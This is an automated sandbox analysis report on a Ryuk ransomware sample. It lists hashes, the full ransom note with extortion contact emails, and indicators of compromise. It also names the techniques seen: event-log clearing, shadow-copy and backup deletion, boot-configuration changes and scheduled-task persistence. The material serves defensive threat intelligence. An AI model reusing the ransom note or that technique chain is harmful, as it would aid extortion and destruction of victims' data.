ryuk | 69e0e73ae659477a01cbc4a7e9720a85daa1e690718449a9f8927b76d755cf93

Analysis

max time kernel
147s
max time network
34s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
11-03-2023 01:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
Size

885KB
MD5

6a5bf25ff4f72ebca91280ffda057260
SHA1

722063331acdbfc93ccbfacbec045800a835dd9e
SHA256

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA512

64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42
SSDEEP

12288:Qm+PiUwyM02Jl5YqWYgeWYg955/155/0QebUlAAsrsKCQoZRn6X:Q5iUtklagQKUKRrsKCQON6

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at Vulcanteam@CYBERFEAR.COM or vulcanteam@inboxhub.net You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

Vulcanteam@CYBERFEAR.COM

vulcanteam@inboxhub.net

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid	process
632	wevtutil.exe
1428	wevtutil.exe
216	wevtutil.exe
764	wevtutil.exe
216	wevtutil.exe
1100	wevtutil.exe
980	wevtutil.exe
1700	wevtutil.exe
1748	wevtutil.exe
216	wevtutil.exe
1088	wevtutil.exe
1524	wevtutil.exe
852	wevtutil.exe
572	wevtutil.exe
608	wevtutil.exe
1280	wevtutil.exe
384	wevtutil.exe
1156	wevtutil.exe
608	wevtutil.exe
1328	wevtutil.exe
1428	wevtutil.exe
228	wevtutil.exe
1616	wevtutil.exe
1928	wevtutil.exe
1920	wevtutil.exe
1280	wevtutil.exe
212	wevtutil.exe
204	wevtutil.exe
2032	wevtutil.exe
1944	wevtutil.exe
772	wevtutil.exe
632	wevtutil.exe
220	wevtutil.exe
1484	wevtutil.exe
2016	wevtutil.exe
836	wevtutil.exe
1740	wevtutil.exe
1636	wevtutil.exe
1524	wevtutil.exe
1308	wevtutil.exe
796	wevtutil.exe
268	wevtutil.exe
1636	wevtutil.exe
1916	wevtutil.exe
1168	wevtutil.exe
1608	wevtutil.exe
1920	wevtutil.exe
1992	wevtutil.exe
1764	wevtutil.exe
1988	wevtutil.exe
1280	wevtutil.exe
952	wevtutil.exe
1132	wevtutil.exe
2044	wevtutil.exe
1200	wevtutil.exe
224	wevtutil.exe
1088	wevtutil.exe
608	wevtutil.exe
204	wevtutil.exe
2044	wevtutil.exe
980	wevtutil.exe
1168	wevtutil.exe
524	wevtutil.exe
212	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

2012 bcdedit.exe
1348 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

1240 wbadmin.exe
Disables Task Manager via registry modification
evasion
Disables taskbar notifications via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

pid	process
2012	bcdedit.exe
1348	bcdedit.exe

pid	process
1240	wbadmin.exe

Drops startup file 3 IoCs

Processes:

attrib.execmd.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

864 icacls.exe

pid	process
864	icacls.exe

Enumerates connected drives 3 TTPs 42 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\N:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\A:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\K:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\O:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\P:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\R:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\S:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\X:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\E:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\L:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\V:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\Y:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\J:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\M:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\Z:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\F:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\W:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\T:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\I:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\B:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\Q:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\U:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\H:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe

Drops file in Program Files directory 64 IoCs

Processes:

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0160590.WMF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0196142.WMF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21315_.GIF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS.DEV_K_COL.HXK.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsImageTemplate.html.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\uninstall.log.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\PSS10R.CHM.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jre7\lib\amd64\jvm.cfg.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\http.luac.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFFile_8.ico.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATERMAR\THMBNAIL.PNG.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STRTEDGE\PREVIEW.GIF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.TLB.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SIGNL.ICO.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.common_3.6.200.v20130402-1505.jar.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\TAB_ON.GIF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jre7\lib\management\snmp.acl.template.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00076_.WMF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107308.WMF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01161_.WMF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00670_.WMF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR43F.GIF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR30B.GIF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\PLUS.GIF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.aup.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107138.WMF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152708.WMF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-9.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_right.gif.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01852_.WMF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152430.WMF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGAD.DPV.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18230_.WMF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSTINTL.DLL.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\SUBMIT.JS.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiling.jar.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10265_.GIF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLBAR.INF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Filters\VISFILT.DLL.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292248.WMF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PPSLAX.DLL.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ICE\PREVIEW.GIF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME42.CSS.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolIcons\GWE.ICO.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\QUERIES\MSN MoneyCentral Investor Stock Quotes.iqy.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baku.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Miquelon.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\OFFREL.DLL.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00443_.WMF.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\EADOCUMENTAPPROVAL_REVIEW.XSN.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen.css.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN089.XML.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lv.txt.[Vulcanteam@CYBERFEAR.COM].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe

Drops file in Windows directory 5 IoCs

Processes:

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exewbadmin.exe

description	ioc	process
File created	C:\Windows\RyukReadMe.txt	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File created	C:\Windows\hrmlog1	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

624 sc.exe
2012 sc.exe
1928 sc.exe
1748 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

468 schtasks.exe
668 schtasks.exe
572 schtasks.exe
1428 schtasks.exe
928 schtasks.exe

pid	process
624	sc.exe
2012	sc.exe
1928	sc.exe
1748	sc.exe

pid	process
468	schtasks.exe
668	schtasks.exe
572	schtasks.exe
1428	schtasks.exe
928	schtasks.exe

Interacts with shadow copies 2 TTPs 15 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
1280	vssadmin.exe
288	vssadmin.exe
268	vssadmin.exe
1700	vssadmin.exe
572	vssadmin.exe
224	vssadmin.exe
1976	vssadmin.exe
1664	vssadmin.exe
2044	vssadmin.exe
1732	vssadmin.exe
272	vssadmin.exe
1988	vssadmin.exe
1524	vssadmin.exe
1088	vssadmin.exe
1100	vssadmin.exe

Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

872 taskkill.exe
1696 taskkill.exe
1328 taskkill.exe
1916 taskkill.exe
1772 taskkill.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

864 NOTEPAD.EXE
Runs net.exe

pid	process
872	taskkill.exe
1696	taskkill.exe
1328	taskkill.exe
1916	taskkill.exe
1772	taskkill.exe

pid	process
864	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe

pid	process
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
